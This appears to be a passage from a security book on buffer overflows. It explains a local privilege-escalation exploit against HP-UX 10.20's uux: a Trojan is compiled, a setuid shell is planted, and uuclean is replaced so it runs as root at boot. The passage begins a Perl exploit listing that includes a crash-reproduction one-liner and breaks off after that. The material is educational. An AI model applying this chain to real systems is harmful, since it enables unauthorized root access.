Buffer Overflow Attacks: Detect, Exploit, Prevent

The /usr/bin/uux is a UUCP-related tool that comes with the HP-UX 10.20. It has a buffer overflow (stack-based) in the code that parses the command line. This can be exploited for executing attacker-supplied code with uucp privileges. This exploit is local and when run it tries to create and compile a Trojan file, /tmp/be.c, with these uucp privileges. This file, when run, creates a copy of /bin/sh in a SETUID file /tmp/ohoh. Then this file, /tmp/Be, is copied in place of the uuclean utility, which is executed on system startup with root privileges because of SETUID bit.
<b class="bold">1.</b> #!/usr/bin/perl <b class="bold">2.</b> # <b class="bold">3.</b> # This exploit was written by the Authoring team for Buffer Overflows <b class="bold">4.</b> # <b class="bold">5.</b> # <b class="bold">6.</b> # The /usr/bin/uux tool that comes with the HP-UX 10.20 install contains a <b class="bold">7.</b> # buffer overflow vulnerability. To reproduce this: <b class="bold">8.</b> # <b class="bold">9.</b> # /usr/bin/uux `perl -e 'print "A" x 5391;print "BBBBB"'`<b class="bold">10.</b> #<b class="bold">11.</b> # The overflow vulnerability can be used to gain uucp privileges. Ones uucp<b class="bold">12.</b> # privs have been obtains it is possible to overwrite the file 'uuclean' with<b class="bold">13.</b> # any kind of code. Because this file is executed by the S202clean_uucp script <b class="bold">14.</b> # during boot time of a default HP-UX 10.20 install, we can gain root access. ...